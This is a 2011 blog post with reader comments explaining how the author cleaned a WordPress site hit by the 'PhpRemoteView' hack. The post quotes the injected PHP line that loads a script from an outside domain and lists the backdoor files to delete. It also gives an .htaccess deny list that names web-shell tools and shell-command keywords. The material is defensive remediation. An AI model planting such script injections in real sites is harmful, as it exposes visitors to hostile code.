PHP, Ubuntu, Ubuntu Server Tricks, Web Programming|August 6, 2011 8:21 pm

Visited 3,184 times.

Removing PHPRemoteView hack attack from your WordPress

Hello guys.

An annoying morning I had today :( Checking my blog I saw a very unpleasant popup comming from my blog:

yes, I’m another victim of some hacker. but there are things we can do to counter this problem. PhpRemoteView is a hack attack well known for many people that owns wordpress blogs and a complete headache for tech support guys. Even wordpress guys does not give a clear answer about the problem.

But not worries, I find out what we need to do to rescue your blogs (and mine included). The first think we need to do is to check the sourcecode of the output page looking for something very unusual. I got an unusualcode from the bottom of my html

<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fwww.tbogard.com%2Fwp-admin%2Findex.php"></script>

then go and browse the index.php on the root of your blog and remove the last line:

echo'<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

So one code down, nevertheless I still had that annoying phpRemoteView comming from my blog. I checked out my Network traffic and seems everything was working fine (sorry, no screenshot of that moment). As far my research is going, thanks to jason cosper I figured out that one of the plugins is making the trouble. So I renamed my plugins directory to plugins.bak, and voila! the site is back and able to access the WP back! No RemotePHPView login and full access to my WordPress Administration backend :D .

Nevertheless I had a couple of bad feelings. My first concern is security issues. So we need to make a general chmod to the directory. if you are the ones that uses 0777 on every file, you are asking for a easy dead. The first thing is secure your directory:

if you are root in ubuntu, do this favor to your wordpress blog and run a chmod to all your files in your blog installation:

chmod -R 0755 /www/wordpress/www.tbogard.com

My second is to find from where and when PhpRemote are being loaded somewhere in the blog, the text PhpRemote is being loaded, so lets look for it:

grep -r "PhpRemoteView" /www/wordpress/www.tbogard.com

(note : when you do a recursive grep, avoid to add a slash to the end of your wordpress blog directory, otherwise it wont work)

Aha!! there are two files with this message :

  • /wp-admin/js/config.php
    /wp-admin/common.php

update, thanks to Techspheria

there are additioonal files to look for:

  • /wp-admin/udp.php
  • /wp-content/udp.php
  • /wp-content/uploads/feed-file.php
  • /wp-content/uploads/feed-files.php

so lets search what files in my plugins.bak directory are loading such files.

grep -r “config.php” /www/wordpress/www.tbogard.com/wp-content/plugins.bak

A grep to “common.php” and “config.php” give me this results

common.php: Warning : a Medium size chunk of code SelectShow

A grep to “config.php” give me this results

config.php: Warning : a huge size chunk of code SelectShow

Update : Certain WP Premium Template users had notified me that the file timthumb.php is the backdoor to this attack. If you use WP-Zoom templates, you should update timthumbs file here. In my case, I use Cadabrapress, and timthumb.php could be found on /wp-content/themes/cadabrapress/scripts. If you use WP-Zoom Templates, check the script folder of your template. Thanks to Benoist Rousseau for his comments.

Analizing the results and behavior of the plugins I decided to delete the wp-minify from my directory of plugins. I think wp-minify is creating the problem since os the only file that loads a “common.php” but also loads information in compressed js related to config.php that is the other phpRemoteView attack file. If you really needed, I suggest you to find another alternatives of js compression, but better avoid that for now.

Since the site is back to the normallity, we can remove this files. the bad news is you may need to reactivate your plugins.

Activate the plugins you consider very esential to your site and avoid executable PHP post for you security.

Note : Also if you use WP-Cache, CLEAR IT AT ALL!!! It may preserve some of the bad scripts. In case you couldn’t ride out the problem, delete the plugin PHISICALLY and get a new version

With this your blog is back to life.

Security measurements.

If you host many sites in your server, avoid to let any PHP script running under 0777. It is very harmful to your security. Instead of it do this as root user:

  1. Once the problem is gone, please make a favor to your wordpress and keep it updated, also update your plugins to the latest working and stable versions.
  2. Make sure you use www-data as the only owner of all the content of the web directory. If your are not sure, execute: 
    chown -R www-data:www-data /your/wordpress/directory
  3. Mase sure all the permissions are setted 0755 (it makes www-data as only owner and only www-data has permission to execute scripts under that only directory): 
    chmod -R 0755 /your/wordpress/directory
  4. Check your /var/log directory and check the log access to your site, it will provide you valuable information about the execution of the hack attack.
  5. update your ubuntu installation allowing to install the latest patches: 
    apt-get update
  6. Change passwords of your root and other users. We are not sure how deep was the attack, so it is very advisable to change passwords.
  7. Bots are your most probable source of problems since then can be able to input very complex information in your forms to exploit your blog. Protect against them using WP-reCaptcha or spam-stopper.
  8. Also a very important piece of code! update your .htaccess! (again, Thanks to Benoist Rousseau)If you want to shield your wordpress installation against RemotePhpView do this:
    1. make a copy of your .htaccess in case it does not work very well.
    2. Add this code to your .htaccess:
    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## ATTENTION A CETTE REGLE. ELLE PEUT CASSER VOTRE SITE ##
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) – [F]

If you find this article useful, give a comment and share your experience. Only shared knowledge can help others to overcome problems. Thank you! Also if you find out my work finding a solution for this hack attack was worth enough, give a small donation… a programmer should survive of something ^_^

Tags: , , , , , , , ,
  • Share this post:
  • Facebook
  • Twitter
  • Delicious
  • Digg
Author:

28 Comments

  • julien August 7, 2011 9:18 am

    Thank you so much for this post… I had the same problem this morning and i followed your advice but as i ‘m not good enough in programming editing I couldn’t do anything else but delete the code line and rename the plugins directory to plugin.bak … Now of course i am blogging without my plugins, i do not dare to go back to old plugins directory… I will ask friends to check further and keep you posted… Thanks

    Reply
    • T.Bogard August 7, 2011 3:55 pm

      Hi julien. If I were you, I will try to find if my template uses timthumb and update it to the latest version. Also, avoid wp-minify. Thank you for sharing your experience.

      Reply
      • julien August 8, 2011 10:27 am

        Hi again… I deleted wp-minify but didn’t find timthumb… how can I know whether it’s there or not ? My blog template is WP-zoom.
        Nobody could help me so far so my blog is still blocked on some levels : people cannot comment anymore… Wery annoying… Any tip ?

        Reply
        • T.Bogard August 8, 2011 12:06 pm

          Checking your blog, i saw your timthumb.php here:

          /wp-content/themes/videozoom/scripts/timthumb.php

          so update this file and half of your problems will be solved.

          Also, if you use WP-cache (i guess) clear it once you delete the common.php and config.php explained above.

          Reply
          • julien August 9, 2011 9:26 pm

            Oh my god. I had no ht.access so I creatd one at the root adding your piece of code… It made the blog not accessible so i deleted the ht.access… Now the articles are not accessible. I cannot do what you recommend… So I am stuck … Any help… It does feel like a catastrophe… Can you help ?

          • T.Bogard August 9, 2011 9:44 pm

            do not worry, use mine :D

            Remember : is .htaccess, not ht.access

            #start shield
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## ATTENTION A CETTE REGLE. ELLE PEUT CASSER VOTRE SITE ##
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) – [F]
</IfModule>
#end shield

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
          • T.Bogard August 9, 2011 9:45 pm

            Also write me to tb.erick.rodriguez[at]gmail.com, so i can provide a better help.

  • Devio August 7, 2011 1:16 pm

    Hi,
    you are great !!
    My site was exactly hacked like you described above.

    Now i deleted all the malicious files.
    Let us closely watch for this again.

    Few days before almost all WP premium theme members are notified to update the timthumb script to its latest version.
    So, i think that this hack might came via timthumb.php script.
    Now i did the update too after this attack.

    Anyways, thanks for pointing about this hack.

    Reply
    • T.Bogard August 7, 2011 4:10 pm

      yes, it also comes from old versions of timthumb. I wonder why wordpress guys does not release an advice to everyone (WP Premium or not, we are WP users). Thanks for sharing your experience.

      Reply
  • Benoist August 7, 2011 1:22 pm

    You can use it in your .htaccess to block commands PhpRemoteview and others.

    RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} ^(.*)=/home/loginftp/(.*)$ [OR]
    RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
    RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## ATTENTION A CETTE REGLE. ELLE PEUT CASSER VOTRE SITE ##
    RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
    RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
    RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
    RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
    RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
    RewriteRule (.*) – [F]

    Save your .htaccess before !

    Reply
  • Name (required) August 7, 2011 1:24 pm

    In the fifth line, change “/ home / loginftp /” with your absolute file path before the folder “www” or “public_html”. This rule is very effective but can break your blog, forum, cms, gallery, wiki. To be used as a last and intensive testing, and possibly delete the rule is problematic.

    Reply
  • Benoist August 7, 2011 1:56 pm

    It’s an hack with TimThumb. Update to version 2 and it will be done to prevent this. ;)

    Reply
    • T.Bogard August 7, 2011 4:14 pm

      Thanks Benoist, your post was fundamentally helpfull to shield WP installations against RemotePhpView. I added your htaccess code to my installation and works ok. If I were you I would change in the fifth line:

      RewriteCond %{QUERY_STRING} ^(.*)=/home/loginftp/(.*)$ [OR]

      to

      RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]

      it will secure the home without risk to take any rights of other users or scale the rights of the www-data user and hijack at once all the server.

      Reply
  • TKin August 7, 2011 2:44 pm

    thanks, it helped me

    Reply
  • David August 7, 2011 5:50 pm

    I just noticed the date of this post. Yeah I just received an attack as well on the 6th with the same domain Superduper.
    Files edited were my index and a e5e580bb7e6f5e01ecf1be2c21a834e7.html type file in my wp-content. There was the following code echo”; ?> in my index. Everything was 705.
    Files added:
    Common.php + udp.php in wp-admin
    config.php in wp-admin/js
    udp in wp-content

    Once all that’s removed, site works like a charm!

    Reply
  • martin August 7, 2011 7:17 pm

    I too was hacked on the 6th, i can access the site but i couldnt access wp-admin/. After looking at this article i just deleted the minify plugin using ftp.

    This worked perfectly.
    My hosting company is godaddy,

    Mart

    Reply
  • Mohsin August 7, 2011 8:31 pm

    I was running almost 17 blogs on my server and because of one loophole all of my blogs were hacked. I applied you method and survived timely. One this i did extra, and it is that i reverted my blogs to older wordpress version as this problem is likely to hit the recent 3.2.1 version of wordpress. Can you please explain whether it is a right step.

    Reply
    • T.Bogard August 8, 2011 12:24 am

      first keep in mind this :

      a.do not revert to older versions of wordpress. it will make the problem worse. locate the files I mention above: /wp-admin/js/config.php and /wp-admin/common.php

      b. delete from your blogs wp-minify and wp-cache (it preserve bad scripts) plugin and update timthumb.php

      c. once you do A and B, revert the plugins.bak to plugins, so it will revive the good plugins. Make sure to UPDATE ALL OF THEM!!!! it is very important to have updated versions to avoid exploits.

      Reply
  • Gini August 8, 2011 7:07 am

    Thank you. It works

    Reply
  • jaś August 8, 2011 11:43 am

    I had the same problem with my blog. I deleted these files on Saturday, but now I have a message from NoScript, which blocks the address 192.168.246.205. The same message I see on this page – maybe something else is left in our blog?

    Reply
    • T.Bogard August 8, 2011 12:10 pm

      You know, it will be useful if you have a snapshot of your network traffic using firebug, so you can detect what is the name of the script and where is being loaded. check your source code and determinate where is being loaded. if there is a funny code messing around, check your plugins and see where is the problem.

      Reply
  • jaś August 8, 2011 3:41 pm

    Now the site work correctly, hmm .. I don’t know why message was before. sorry for the false post.

    Reply
  • HF August 10, 2011 10:11 pm

    Heeey, I just got this. I deleted the strange php files but I could not find the code in the index.

    Can anyone help me out :(

    My site can be found on my name if you want to look

    Reply
  • Serge V. Richard August 11, 2011 11:36 am

    Thanks a million John! I’ve bookedmarked your blog, have cleaned and updated all my clients blog accordingly (mine included)

    I feel much safer now with this fix and your suggestions.

    Regards,
    Serge

    Reply
  • Matt August 11, 2011 5:53 pm

    Thanks for this my site was hacked this way too I took the nessacary precautions as you said. Your a life saver!

    Reply
  • Gunsmith August 15, 2011 12:35 pm

    I had fixed everything but still was getting the redirect until I found your site with the tip to clear cache – great!

    But was really great was that orochinagi.com was saved by Terry Bogard? Coincidence or fate? BUSTER WOLF OK!

    Reply

Leave a Reply


Why ask?

T.Bogard's Journey Blog